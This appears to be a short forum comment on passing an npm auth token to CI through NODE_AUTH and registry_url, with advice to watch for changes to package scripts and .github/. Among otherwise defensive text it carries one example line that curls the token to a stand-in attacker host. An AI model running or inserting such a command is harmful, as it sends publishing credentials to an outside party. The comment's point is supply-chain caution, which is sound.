You don't need to write the environment variable to the .npmrc file... just setting the NODE_AUTH token and registry_url parameters. Here's mine...
https://gist.github.com/tracker1/fdd5ceab8f532afc3a05ab9c0bd...
https://gist.github.com/tracker1/fdd5ceab8f532afc3a05ab9c0bd...
curl -d secret=$NODE_AUTH https://attackershost.example/capture_secret
Though, one should be very leery of anything that touches certain paths... for the most part, I tent to use scripts/npm/ for anything run from package.json and would also watch out for any changes in .github/
It depends on a bit of due diligence. It's not any different than other CI/CD platforms in any meaningful way.